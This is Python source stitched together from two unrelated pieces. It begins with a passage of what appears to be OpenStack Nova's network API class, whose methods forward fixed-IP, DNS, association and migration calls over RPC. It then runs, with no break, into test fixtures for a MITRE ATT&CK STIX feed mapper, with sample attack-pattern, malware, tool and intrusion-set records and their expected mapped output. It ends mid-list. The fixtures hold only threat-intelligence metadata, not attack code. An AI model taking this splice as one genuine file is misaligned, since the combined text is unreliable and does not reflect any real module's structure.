    @wrap_check_policy
    def deallocate_for_instance(self, context, instance, **kwargs):
        """Deallocates all network structures related to instance."""
        args = {}
        # NOTE(review): uses instance['id'] here, unlike the allocate path
        # which uses instance['uuid'] -- presumably matching the RPC
        # signatures; confirm before changing.
        args['instance_id'] = instance['id']
        args['project_id'] = instance['project_id']
        args['host'] = instance['host']
        self.network_rpcapi.deallocate_for_instance(context, **args)

    @wrap_check_policy
    @refresh_cache
    def add_fixed_ip_to_instance(self, context, instance, network_id,
                                 conductor_api=None, **kwargs):
        """Adds a fixed ip to instance from specified network."""
        args = {'instance_id': instance['uuid'],
                'host': instance['host'],
                'network_id': network_id,
                'rxtx_factor': None}
        self.network_rpcapi.add_fixed_ip_to_instance(context, **args)

    @wrap_check_policy
    @refresh_cache
    def remove_fixed_ip_from_instance(self, context, instance, address,
                                      conductor=None, **kwargs):
        """Removes a fixed ip from instance from specified network."""
        args = {'instance_id': instance['uuid'],
                'host': instance['host'],
                'address': address,
                'rxtx_factor': None}
        self.network_rpcapi.remove_fixed_ip_from_instance(context, **args)

    @wrap_check_policy
    def add_network_to_project(self, context, project_id, network_uuid=None):
        """Force adds another network to a project."""
        self.network_rpcapi.add_network_to_project(context, project_id,
                                                   network_uuid)

    @wrap_check_policy
    def associate(self, context, network_uuid, host=_sentinel,
                  project=_sentinel):
        """Associate or disassociate host or project to network."""
        # Only include keys the caller actually passed; the _sentinel default
        # lets an explicit None (meaning "disassociate") through.
        associations = {}
        if host is not API._sentinel:
            associations['host'] = host
        if project is not API._sentinel:
            associations['project'] = project
        self.network_rpcapi.associate(context, network_uuid, associations)

    @wrap_check_policy
    def get_instance_nw_info(self, context, instance, conductor_api=None,
                             **kwargs):
        """Returns all network info related to an instance."""
        result = self._get_instance_nw_info(context, instance)
        # Refresh the instance's cached network info with the fresh result.
        update_instance_cache_with_nw_info(self, context, instance,
                                           result, conductor_api)
        return result

    def _get_instance_nw_info(self, context, instance):
        """Returns all network info related to an instance."""
        args = {'instance_id': instance['uuid'],
                'rxtx_factor': instance['instance_type']['rxtx_factor'],
                'host': instance['host'],
                'project_id': instance['project_id']}
        nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)

        return network_model.NetworkInfo.hydrate(nw_info)

    @wrap_check_policy
    def validate_networks(self, context, requested_networks):
        """validate the networks passed at the time of creating
        the server
        """
        return self.network_rpcapi.validate_networks(context,
                                                     requested_networks)

    @wrap_check_policy
    def get_instance_uuids_by_ip_filter(self, context, filters):
        """Returns a list of dicts in the form of
        {'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
        """
        return self.network_rpcapi.get_instance_uuids_by_ip_filter(context,
                                                                   filters)

    @wrap_check_policy
    def get_dns_domains(self, context):
        """Returns a list of available dns domains.
        These can be used to create DNS entries for floating ips.
        """
        return self.network_rpcapi.get_dns_domains(context)

    @wrap_check_policy
    def add_dns_entry(self, context, address, name, dns_type, domain):
        """Create specified DNS entry for address."""
        args = {'address': address,
                'name': name,
                'dns_type': dns_type,
                'domain': domain}
        return self.network_rpcapi.add_dns_entry(context, **args)

    @wrap_check_policy
    def modify_dns_entry(self, context, name, address, domain):
        """Create specified DNS entry for address."""
        args = {'address': address,
                'name': name,
                'domain': domain}
        return self.network_rpcapi.modify_dns_entry(context, **args)

    @wrap_check_policy
    def delete_dns_entry(self, context, name, domain):
        """Delete the specified dns entry."""
        args = {'name': name, 'domain': domain}
        return self.network_rpcapi.delete_dns_entry(context, **args)

    @wrap_check_policy
    def delete_dns_domain(self, context, domain):
        """Delete the specified dns domain."""
        return self.network_rpcapi.delete_dns_domain(context, domain=domain)

    @wrap_check_policy
    def get_dns_entries_by_address(self, context, address, domain):
        """Get entries for address and domain."""
        args = {'address': address, 'domain': domain}
        return self.network_rpcapi.get_dns_entries_by_address(context, **args)

    @wrap_check_policy
    def get_dns_entries_by_name(self, context, name, domain):
        """Get entries for name and domain."""
        args = {'name': name, 'domain': domain}
        return self.network_rpcapi.get_dns_entries_by_name(context, **args)

    @wrap_check_policy
    def create_private_dns_domain(self, context, domain, availability_zone):
        """Create a private DNS domain with nova availability zone."""
        args = {'domain': domain, 'av_zone': availability_zone}
        return self.network_rpcapi.create_private_dns_domain(context, **args)

    @wrap_check_policy
    def create_public_dns_domain(self, context, domain, project=None):
        """Create a public DNS domain with optional nova project."""
        args = {'domain': domain, 'project': project}
        return self.network_rpcapi.create_public_dns_domain(context, **args)

    @wrap_check_policy
    def setup_networks_on_host(self, context, instance, host=None,
                               teardown=False):
        """Setup or teardown the network structures on hosts related to
           instance"""
        host = host or instance['host']
        # NOTE(tr3buchet): host is passed in cases where we need to setup
        # or teardown the networks on a host which has been migrated to/from
        # and instance['host'] is not yet or is no longer equal to
        args = {'instance_id': instance['id'],
                'host': host,
                'teardown': teardown}

        self.network_rpcapi.setup_networks_on_host(context, **args)

    def _is_multi_host(self, context, instance):
        # True when the instance's network is configured multi-host; an
        # instance with no fixed IPs is treated as not multi-host.
        try:
            fixed_ips = self.db.fixed_ip_get_by_instance(context,
                                                         instance['uuid'])
        except exception.FixedIpNotFoundForInstance:
            return False
        network = self.db.network_get(context, fixed_ips[0]['network_id'],
                                      project_only='allow_none')
        return network['multi_host']

    def _get_floating_ip_addresses(self, context, instance):
        # All floating IP addresses currently attached to the instance.
        args = (context, instance['uuid'])
        floating_ips = self.db.instance_floating_address_get_all(*args)
        return [floating_ip['address'] for floating_ip in floating_ips]

    @wrap_check_policy
    def migrate_instance_start(self, context, instance, migration):
        """Start to migrate the network of an instance."""
        args = dict(
            instance_uuid=instance['uuid'],
            rxtx_factor=instance['instance_type']['rxtx_factor'],
            project_id=instance['project_id'],
            source_compute=migration['source_compute'],
            dest_compute=migration['dest_compute'],
            floating_addresses=None,
        )

        # Multi-host networks need the floating addresses migrated and the
        # RPC targeted at the source host.
        if self._is_multi_host(context, instance):
            args['floating_addresses'] = \
                self._get_floating_ip_addresses(context, instance)
            args['host'] = migration['source_compute']

        self.network_rpcapi.migrate_instance_start(context, **args)

    @wrap_check_policy
    def migrate_instance_finish(self, context, instance, migration):
        """Finish migrating the network of an instance."""
        args = dict(
            instance_uuid=instance['uuid'],
            rxtx_factor=instance['instance_type']['rxtx_factor'],
            project_id=instance['project_id'],
            source_compute=migration['source_compute'],
            dest_compute=migration['dest_compute'],
            floating_addresses=None,
        )

        # Mirror of migrate_instance_start, but targeted at the destination.
        if self._is_multi_host(context, instance):
            args['floating_addresses'] = \
                self._get_floating_ip_addresses(context, instance)
            args['host'] = migration['dest_compute']

        self.network_rpcapi.migrate_instance_finish(context, **args)

    # NOTE(jkoelker) These functions where added to the api after
    #                deprecation. Stubs provided for support documentation
    def allocate_port_for_instance(self, context, instance, port_id,
                                   network_id=None, requested_ip=None,
                                   conductor_api=None):
        raise NotImplementedError()

    def deallocate_port_for_instance(self, context, instance, port_id,
                                     conductor_api=None):
        raise NotImplementedError()

    def list_ports(self, *args, **kwargs):
        raise NotImplementedError()

    def show_port(self, *args, **kwargs):
        raise NotImplementedError()
# ---------------------------------------------------------------------------
# Test fixtures for a MITRE ATT&CK STIX 2.x feed integration.
#
# Each object-type constant below bundles, where present:
#   'response'   - a raw STIX object used as test input
#   'map_result' - the field dict the mapper is expected to produce from it
#   'indicator'  - the expected indicator-builder output, a 4-tuple of
#                  (indicator dicts, a list [empty in these cases],
#                   {stix id -> name}, {mitre external id -> name} [populated
#                   only for the attack-pattern case here])
# The STIX_* variants expect 'stix'-prefixed field names (stixdescription,
# stixaliases, stixkillchainphases) in their 'map_result'.
# NOTE(review): data intentionally byte-identical to the original fixtures.
# ---------------------------------------------------------------------------

# attack-pattern object: killchainphases/operatingsystemrefs populated,
# publications built from the non-'mitre-attack' external references.
ATTACK_PATTERN = {
    'response': {
        "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
        "name": "ATTACK_PATTERN 1",
        "type": "attack-pattern",
        "modified": "2020-05-13T22:50:51.258Z",
        "created": "2017-05-31T21:30:44.329Z",
        "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.",
        "x_mitre_platforms": [
            "Windows"
        ],
        "external_references": [
            {
                "url": "https://attack.mitre.org/techniques/T1047",
                "source_name": "mitre-attack",
                "external_id": "T1047"
            },
            {
                "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.",
                "source_name": "Wikipedia SMB",
                "url": "https://en.wikipedia.org/wiki/Server_Message_Block"
            },
            {
                "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.",
                "source_name": "TechNet RPC",
                "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx"
            },
        ],
        "kill_chain_phases": [
            {
                "phase_name": "defense-evasion",
                "kill_chain_name": "mitre-attack"
            },
            {
                "phase_name": "privilege-escalation",
                "kill_chain_name": "mitre-attack"
            }
        ]
    },
    'map_result': {
        'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055',
        'firstseenbysource': '2017-05-31T21:30:44.329Z',
        'killchainphases': ['Defense Evasion', 'Privilege Escalation'],
        'modified': "2020-05-13T22:50:51.258Z",
        'description': "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.",
        'operatingsystemrefs': ['Windows'],
        'mitreid': 'T1047',
        'publications': [{'link': "https://en.wikipedia.org/wiki/Server_Message_Block",
                          'title': "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.",
                          'source': 'Wikipedia SMB'},
                         {'link': "https://technet.microsoft.com/en-us/library/cc787851.aspx",
                          'title': 'Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.',
                          "source": 'TechNet RPC'}],
        'tags': ['T1047']
    },
    'indicator': ([{'fields': {'description': 'Adversaries may abuse Windows Management '
                                              'Instrumentation (WMI) to achieve execution.',
                               'firstseenbysource': '2017-05-31T21:30:44.329Z',
                               'killchainphases': ['Defense Evasion', 'Privilege Escalation'],
                               'mitreid': 'T1047',
                               'modified': '2020-05-13T22:50:51.258Z',
                               'operatingsystemrefs': ['Windows'],
                               'publications': [{'link': 'https://en.wikipedia.org/wiki/Server_Message_Block',
                                                 'source': 'Wikipedia SMB',
                                                 'title': 'Wikipedia. (2016, June 12). Server '
                                                          'Message Block. Retrieved June 12, '
                                                          '2016.'},
                                                {'link': 'https://technet.microsoft.com/en-us/library/cc787851.aspx',
                                                 'source': 'TechNet RPC',
                                                 'title': 'Microsoft. (2003, March 28). What Is '
                                                          'RPC?. Retrieved June 12, 2016.'}],
                               'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055',
                               'tags': ['T1047']},
                    'rawJSON': {'created': '2017-05-31T21:30:44.329Z',
                                'description': 'Adversaries may abuse Windows Management '
                                               'Instrumentation (WMI) to achieve execution.',
                                'external_references': [{'external_id': 'T1047',
                                                         'source_name': 'mitre-attack',
                                                         'url': 'https://attack.mitre.org/techniques/T1047'},
                                                        {'description': 'Wikipedia. (2016, June '
                                                                        '12). Server Message '
                                                                        'Block. Retrieved June '
                                                                        '12, 2016.',
                                                         'source_name': 'Wikipedia SMB',
                                                         'url': 'https://en.wikipedia.org/wiki/Server_Message_Block'},
                                                        {'description': 'Microsoft. (2003, '
                                                                        'March 28). What Is '
                                                                        'RPC?. Retrieved June '
                                                                        '12, 2016.',
                                                         'source_name': 'TechNet RPC',
                                                         'url': 'https://technet.microsoft.com/en-us/library/cc787851.aspx'}],
                                'id': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055',
                                'kill_chain_phases': [{'kill_chain_name': 'mitre-attack',
                                                       'phase_name': 'defense-evasion'},
                                                      {'kill_chain_name': 'mitre-attack',
                                                       'phase_name': 'privilege-escalation'}],
                                'modified': '2020-05-13T22:50:51.258Z',
                                'name': 'ATTACK_PATTERN 1',
                                'type': 'attack-pattern',
                                'x_mitre_platforms': ['Windows']},
                    'score': 2,
                    'type': 'Attack Pattern',
                    'value': 'ATTACK_PATTERN 1'}],
                  [],
                  {'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055': 'ATTACK_PATTERN 1'},
                  {'T1047': 'ATTACK_PATTERN 1'})
}

# Same raw attack-pattern, but mapped with 'stix'-prefixed field names.
STIX_ATTACK_PATTERN = {
    'response': {
        "id": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055",
        "name": "ATTACK_PATTERN 1",
        "type": "attack-pattern",
        "modified": "2020-05-13T22:50:51.258Z",
        "created": "2017-05-31T21:30:44.329Z",
        "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.",
        "x_mitre_platforms": [
            "Windows"
        ],
        "external_references": [
            {
                "url": "https://attack.mitre.org/techniques/T1047",
                "source_name": "mitre-attack",
                "external_id": "T1047"
            },
            {
                "description": "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.",
                "source_name": "Wikipedia SMB",
                "url": "https://en.wikipedia.org/wiki/Server_Message_Block"
            },
            {
                "description": "Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.",
                "source_name": "TechNet RPC",
                "url": "https://technet.microsoft.com/en-us/library/cc787851.aspx"
            },
        ],
        "kill_chain_phases": [
            {
                "phase_name": "defense-evasion",
                "kill_chain_name": "mitre-attack"
            },
            {
                "phase_name": "privilege-escalation",
                "kill_chain_name": "mitre-attack"
            }
        ]
    },
    'map_result': {
        'stixid': 'attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055',
        'firstseenbysource': '2017-05-31T21:30:44.329Z',
        'stixkillchainphases': ['Defense Evasion', 'Privilege Escalation'],
        'modified': "2020-05-13T22:50:51.258Z",
        'stixdescription': "Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution.",
        'operatingsystemrefs': ['Windows'],
        'mitreid': 'T1047',
        'publications': [{'link': "https://en.wikipedia.org/wiki/Server_Message_Block",
                          'title': "Wikipedia. (2016, June 12). Server Message Block. Retrieved June 12, 2016.",
                          'source': 'Wikipedia SMB'},
                         {'link': "https://technet.microsoft.com/en-us/library/cc787851.aspx",
                          'title': 'Microsoft. (2003, March 28). What Is RPC?. Retrieved June 12, 2016.',
                          "source": 'TechNet RPC'}],
        'tags': ['T1047']
    }
}

# course-of-action object: no publications, indicator score 0, and an empty
# mitre-id->name map in the expected indicator tuple.
COURSE_OF_ACTION = {
    'response': {
        "id": "course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22",
        "name": "COURSE_OF_ACTION 1",
        "type": "course-of-action",
        "description": "Prevent files from having a trailing space after the extension.",
        "modified": "2019-07-25T11:46:32.010Z",
        "external_references": [
            {
                "external_id": "T1151",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/mitigations/T1151"
            }
        ],
        "created": "2018-10-17T00:14:20.652Z"
    },
    'map_result': {'description': 'Prevent files from having a trailing space after the '
                                  'extension.',
                   'firstseenbysource': '2018-10-17T00:14:20.652Z',
                   'mitreid': 'T1151',
                   'modified': '2019-07-25T11:46:32.010Z',
                   'publications': [],
                   'stixid': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22',
                   'tags': ['T1151']},
    'indicator': ([{'fields': {'description': 'Prevent files from having a trailing space after '
                                              'the extension.',
                               'firstseenbysource': '2018-10-17T00:14:20.652Z',
                               'mitreid': 'T1151',
                               'modified': '2019-07-25T11:46:32.010Z',
                               'publications': [],
                               'stixid': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22',
                               'tags': ['T1151']},
                    'rawJSON': {'created': '2018-10-17T00:14:20.652Z',
                                'description': 'Prevent files from having a trailing space '
                                               'after the extension.',
                                'external_references': [{'external_id': 'T1151',
                                                         'source_name': 'mitre-attack',
                                                         'url': 'https://attack.mitre.org/mitigations/T1151'}],
                                'id': 'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22',
                                'modified': '2019-07-25T11:46:32.010Z',
                                'name': 'COURSE_OF_ACTION 1',
                                'type': 'course-of-action'},
                    'score': 0,
                    'type': 'Course of Action',
                    'value': 'COURSE_OF_ACTION 1'}],
                  [],
                  {'course-of-action--02f0f92a-0a51-4c94-9bda-6437b9a93f22': 'COURSE_OF_ACTION 1'},
                  {})
}

# intrusion-set object: exercises aliases and a citation-style external
# reference without a URL (publication 'link' maps to None).
INTRUSION_SET = {
    'response': {
        "external_references": [
            {
                "external_id": "G0066",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/groups/G0066"
            },
            {
                "description": "(Citation: Security Affairs Elderwood Sept 2012)",
                "source_name": "Elderwood"
            },
        ],
        "description": "[Elderwood](https://attack.mitre.org/groups/G0066)",
        "modified": "2021-03-02T22:40:11.097Z",
        "created": "2018-04-18T17:59:24.739Z",
        "aliases": [
            "Elderwood",
            "Elderwood Gang",
            "Beijing Group",
            "Sneaky Panda"
        ],
        "id": "intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484",
        "name": "INTRUSION_SET 1",
        "type": "intrusion-set"
    },
    'map_result': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group', 'Sneaky Panda'],
                   'description': '[Elderwood](https://attack.mitre.org/groups/G0066)',
                   'firstseenbysource': '2018-04-18T17:59:24.739Z',
                   'mitreid': 'G0066',
                   'modified': '2021-03-02T22:40:11.097Z',
                   'publications': [{'link': None,
                                     'source': 'Elderwood',
                                     'title': '(Citation: Security Affairs Elderwood Sept '
                                              '2012)'}],
                   'stixid': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484',
                   'tags': ['G0066']},
    "indicator": ([{'fields': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group',
                                           'Sneaky Panda'],
                               'description': '[Elderwood](https://attack.mitre.org/groups/G0066)',
                               'firstseenbysource': '2018-04-18T17:59:24.739Z',
                               'mitreid': 'G0066',
                               'modified': '2021-03-02T22:40:11.097Z',
                               'publications': [{'link': None,
                                                 'source': 'Elderwood',
                                                 'title': '(Citation: Security Affairs '
                                                          'Elderwood Sept 2012)'}],
                               'stixid': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484',
                               'tags': ['G0066']},
                    'rawJSON': {'aliases': ['Elderwood', 'Elderwood Gang', 'Beijing Group',
                                            'Sneaky Panda'],
                                'created': '2018-04-18T17:59:24.739Z',
                                'description': '[Elderwood](https://attack.mitre.org/groups/G0066)',
                                'external_references': [{'external_id': 'G0066',
                                                         'source_name': 'mitre-attack',
                                                         'url': 'https://attack.mitre.org/groups/G0066'},
                                                        {'description': '(Citation: Security '
                                                                        'Affairs Elderwood Sept '
                                                                        '2012)',
                                                         'source_name': 'Elderwood'}],
                                'id': 'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484',
                                'modified': '2021-03-02T22:40:11.097Z',
                                'name': 'INTRUSION_SET 1',
                                'type': 'intrusion-set'},
                    'score': 3,
                    'type': 'Intrusion Set',
                    'value': 'INTRUSION_SET 1'}],
                  [],
                  {'intrusion-set--03506554-5f37-4f8f-9ce4-0e9f01a1b484': 'INTRUSION_SET 1'},
                  {})
}

# malware object: 'labels' contributes the extra 'malware' tag.
MALWARE = {
    'response': {
        "description": "[Wiarp](https://attack.mitre.org/software/S0206)",
        "external_references": [
            {
                "external_id": "S0206",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/software/S0206"
            },
            {
                "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.",
                "source_name": "Symantec Wiarp May 2012",
                "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99"
            }
        ],
        "x_mitre_platforms": [
            "Windows"
        ],
        "x_mitre_aliases": [
            "Wiarp"
        ],
        "modified": "2021-01-06T19:32:28.378Z",
        "created": "2018-04-18T17:59:24.739Z",
        "labels": [
            "malware"
        ],
        "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
        "name": "MALWARE 1",
        "type": "malware"
    },
    'map_result': {'aliases': ['Wiarp'],
                   'description': '[Wiarp](https://attack.mitre.org/software/S0206)',
                   'firstseenbysource': '2018-04-18T17:59:24.739Z',
                   'mitreid': 'S0206',
                   'modified': '2021-01-06T19:32:28.378Z',
                   'operatingsystemrefs': ['Windows'],
                   'publications': [
                       {'link': 'https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99',
                        'source': 'Symantec Wiarp May 2012',
                        'title': 'Zhou, R. (2012, May 15). Backdoor.Wiarp. '
                                 'Retrieved February 22, 2018.'}],
                   'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a',
                   'tags': ['S0206', 'malware']},
    "indicator": ([{'fields': {'aliases': ['Wiarp'],
                               'description': '[Wiarp](https://attack.mitre.org/software/S0206)',
                               'firstseenbysource': '2018-04-18T17:59:24.739Z',
                               'mitreid': 'S0206',
                               'modified': '2021-01-06T19:32:28.378Z',
                               'operatingsystemrefs': ['Windows'],
                               'publications': [{
                                   'link': 'https://www.symantec.com/security_response/writeup.jsp?'
                                           'docid=2012-051606-1005-99',
                                   'source': 'Symantec Wiarp May 2012',
                                   'title': 'Zhou, R. (2012, May 15). '
                                            'Backdoor.Wiarp. Retrieved February '
                                            '22, 2018.'}],
                               'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a',
                               'tags': ['S0206', 'malware']},
                    'rawJSON': {'created': '2018-04-18T17:59:24.739Z',
                                'description': '[Wiarp](https://attack.mitre.org/software/S0206)',
                                'external_references': [{'external_id': 'S0206',
                                                         'source_name': 'mitre-attack',
                                                         'url': 'https://attack.mitre.org/software/S0206'},
                                                        {'description': 'Zhou, R. (2012, May '
                                                                        '15). Backdoor.Wiarp. '
                                                                        'Retrieved February 22, '
                                                                        '2018.',
                                                         'source_name': 'Symantec Wiarp May '
                                                                        '2012',
                                                         'url': 'https://www.symantec.com/security_response/writeup.jsp'
                                                                '?docid=2012-051606-1005-99'}],
                                'id': 'malware--039814a0-88de-46c5-a4fb-b293db21880a',
                                'labels': ['malware'],
                                'modified': '2021-01-06T19:32:28.378Z',
                                'name': 'MALWARE 1',
                                'type': 'malware',
                                'x_mitre_aliases': ['Wiarp'],
                                'x_mitre_platforms': ['Windows']},
                    'score': 3,
                    'type': 'Malware',
                    'value': 'MALWARE 1'}],
                  [],
                  {'malware--039814a0-88de-46c5-a4fb-b293db21880a': 'MALWARE 1'},
                  {})
}

# Same raw malware object, mapped with 'stix'-prefixed field names.
STIX_MALWARE = {
    'response': {
        "description": "[Wiarp](https://attack.mitre.org/software/S0206)",
        "external_references": [
            {
                "external_id": "S0206",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/software/S0206"
            },
            {
                "description": "Zhou, R. (2012, May 15). Backdoor.Wiarp. Retrieved February 22, 2018.",
                "source_name": "Symantec Wiarp May 2012",
                "url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99"
            }
        ],
        "x_mitre_platforms": [
            "Windows"
        ],
        "x_mitre_aliases": [
            "Wiarp"
        ],
        "modified": "2021-01-06T19:32:28.378Z",
        "created": "2018-04-18T17:59:24.739Z",
        "labels": [
            "malware"
        ],
        "id": "malware--039814a0-88de-46c5-a4fb-b293db21880a",
        "name": "MALWARE 1",
        "type": "malware"
    },
    'map_result': {'stixaliases': ['Wiarp'],
                   'stixdescription': '[Wiarp](https://attack.mitre.org/software/S0206)',
                   'firstseenbysource': '2018-04-18T17:59:24.739Z',
                   'mitreid': 'S0206',
                   'modified': '2021-01-06T19:32:28.378Z',
                   'operatingsystemrefs': ['Windows'],
                   'publications': [
                       {'link': 'https://www.symantec.com/security_response/writeup.jsp?docid=2012-051606-1005-99',
                        'source': 'Symantec Wiarp May 2012',
                        'title': 'Zhou, R. (2012, May 15). Backdoor.Wiarp. '
                                 'Retrieved February 22, 2018.'}],
                   'stixid': 'malware--039814a0-88de-46c5-a4fb-b293db21880a',
                   'tags': ['S0206', 'malware']}
}

# tool object: 'labels' contributes the extra 'tool' tag, score 2.
TOOL = {
    'response': {
        "name": "TOOL 1",
        "type": "tool",
        "description": "[PowerSploit](https://attack.mitre.org/software/S0194)",
        "external_references": [
            {
                "external_id": "S0194",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/software/S0194"
            }
        ],
        "x_mitre_platforms": [
            "Windows"
        ],
        "x_mitre_aliases": [
            "PowerSploit"
        ],
        "modified": "2021-02-09T14:00:16.093Z",
        "created": "2018-04-18T17:59:24.739Z",
        "labels": [
            "tool"
        ],
        "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d"
    },
    'map_result': {'aliases': ['PowerSploit'],
                   'description': '[PowerSploit](https://attack.mitre.org/software/S0194)',
                   'firstseenbysource': '2018-04-18T17:59:24.739Z',
                   'mitreid': 'S0194',
                   'modified': '2021-02-09T14:00:16.093Z',
                   'operatingsystemrefs': ['Windows'],
                   'publications': [],
                   'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d',
                   'tags': ['S0194', 'tool']},
    "indicator": ([{'fields': {'aliases': ['PowerSploit'],
                               'description': '[PowerSploit](https://attack.mitre.org/software/S0194)',
                               'firstseenbysource': '2018-04-18T17:59:24.739Z',
                               'mitreid': 'S0194',
                               'modified': '2021-02-09T14:00:16.093Z',
                               'operatingsystemrefs': ['Windows'],
                               'publications': [],
                               'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d',
                               'tags': ['S0194', 'tool']},
                    'rawJSON': {'created': '2018-04-18T17:59:24.739Z',
                                'description': '[PowerSploit](https://attack.mitre.org/software/S0194)',
                                'external_references': [{'external_id': 'S0194',
                                                         'source_name': 'mitre-attack',
                                                         'url': 'https://attack.mitre.org/software/S0194'}],
                                'id': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d',
                                'labels': ['tool'],
                                'modified': '2021-02-09T14:00:16.093Z',
                                'name': 'TOOL 1',
                                'type': 'tool',
                                'x_mitre_aliases': ['PowerSploit'],
                                'x_mitre_platforms': ['Windows']},
                    'score': 2,
                    'type': 'Tool',
                    'value': 'TOOL 1'}],
                  [],
                  {'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d': 'TOOL 1'},
                  {})
}

# Same raw tool object, mapped with 'stix'-prefixed field names.
STIX_TOOL = {
    'response': {
        "name": "TOOL 1",
        "type": "tool",
        "description": "[PowerSploit](https://attack.mitre.org/software/S0194)",
        "external_references": [
            {
                "external_id": "S0194",
                "source_name": "mitre-attack",
                "url": "https://attack.mitre.org/software/S0194"
            }
        ],
        "x_mitre_platforms": [
            "Windows"
        ],
        "x_mitre_aliases": [
            "PowerSploit"
        ],
        "modified": "2021-02-09T14:00:16.093Z",
        "created": "2018-04-18T17:59:24.739Z",
        "labels": [
            "tool"
        ],
        "id": "tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d"
    },
    'map_result': {'stixaliases': ['PowerSploit'],
                   'stixdescription': '[PowerSploit](https://attack.mitre.org/software/S0194)',
                   'firstseenbysource': '2018-04-18T17:59:24.739Z',
                   'mitreid': 'S0194',
                   'modified': '2021-02-09T14:00:16.093Z',
                   'operatingsystemrefs': ['Windows'],
                   'publications': [],
                   'stixid': 'tool--13cd9151-83b7-410d-9f98-25d0f0d1d80d',
                   'tags': ['S0194', 'tool']},
}

# stix id -> display name lookup used by the relationship fixture below.
ID_TO_NAME = {
    "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0": "entity b",
    "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44": "entity a"
}

# relationship object: source/target refs resolve via ID_TO_NAME; the
# 'uses' relationship is expected to get reverse name 'used-by'.
RELATION = {
    'response': {
        "type": "relationship",
        "description": " [Explosive](https://attack.mitre.org/software/S0569)",
        "source_ref": "malware--6a21e3a4-5ffe-4581-af9a-6a54c7536f44",
        "created": "2021-04-27T01:56:35.810Z",
        "relationship_type": "uses",
        "modified": "2021-04-27T01:56:35.810Z",
        "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
    },
    "indicator": [{'entityA': 'entity a',
                   'entityAFamily': 'Indicator',
                   'entityAType': 'Malware',
                   'entityB': 'entity b',
                   'entityBFamily': 'Indicator',
                   'entityBType': 'Attack Pattern',
                   'fields': {'description': ' '
                                             '[Explosive](https://attack.mitre.org/software/S0569)',
                              'firstseenbysource': '2021-04-27T01:56:35.810Z',
                              'lastseenbysource': '2021-04-27T01:56:35.810Z'},
                   'name': 'uses',
                   'reverseName': 'used-by',
                   'type': 'IndicatorToIndicator'}]
}

# Indicator lists before/after '[Malware]' disambiguation of values that
# collide with Intrusion Set names (RTM, Machete).
MALWARE_LIST_WITHOUT_PREFIX = [
    {"type": "Intrusion Set", "value": "RTM", 'fields': {"stixid": "1111"}},
    {"type": "Intrusion Set", "value": "Machete", 'fields': {"stixid": "2222"}},
    {"type": "Intrusion Set", "value": "APT1", 'fields': {"stixid": "3333"}},
    {"type": "Intrusion Set", "value": "ATP12", 'fields': {"stixid": "4444"}},
    {"type": "Malware", "value": "RTM", 'fields': {"stixid": "5555"}},
    {"type": "Malware", "value": "Machete", 'fields': {"stixid": "6666"}},
    {"type": "Malware", "value": "ABK", 'fields': {"stixid": "7777"}},
    {"type": "Malware", "value": "Adups", 'fields': {"stixid": "8888"}},
    {"type": "Malware", "value": "4H RAT", 'fields': {"stixid": "9999"}},
    {"type": "Attack Pattern", "value": "Access Token", 'fields': {"stixid": "0000"}},
    {"type": "Tool", "value": "at", 'fields': {"stixid": "1212"}},
    {"type": "Course of Action", "value": "Account Use Policies", 'fields': {"stixid": "2323"}}
]

MALWARE_LIST_WITH_PREFIX = [
    {"type": "Intrusion Set", "value": "RTM", 'fields': {"stixid": "1111"}},
    {"type": "Intrusion Set", "value": "Machete", 'fields': {"stixid": "2222"}},
    {"type": "Intrusion Set", "value": "APT1", 'fields': {"stixid": "3333"}},
